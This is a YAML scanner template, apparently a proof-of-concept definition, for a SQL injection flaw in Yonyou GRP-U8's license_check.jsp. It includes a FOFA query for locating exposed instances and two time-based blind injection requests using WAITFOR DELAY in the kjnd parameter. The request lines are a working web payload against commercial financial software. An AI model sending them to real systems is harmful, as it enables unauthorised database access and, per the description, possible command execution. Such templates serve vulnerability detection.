product: 用友GRP-U8
vName: 用友GRP-U8 license_check.jsp SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 用友GRP-U8 license_check.jsp 存在sql注入，攻击者可利用该漏洞执行任意SQL语句，如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。
version: ''
note: ''
search:
  FOFA: app="用友-GRP-U8"
protocol: http
link: https://www.cnblogs.com/pursue-security/p/17793734.html
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /u8qx/license_check.jsp?kjnd=1';WAITFOR DELAY '0:0:5'--
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          time:
            check: '>='
            num: 5
  - exp:
      method: get
      follow: false
      path: /u8qx/license_check.jsp?kjnd=1';WAITFOR DELAY '0:0:0'--
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          time:
            check: <=
            num: 3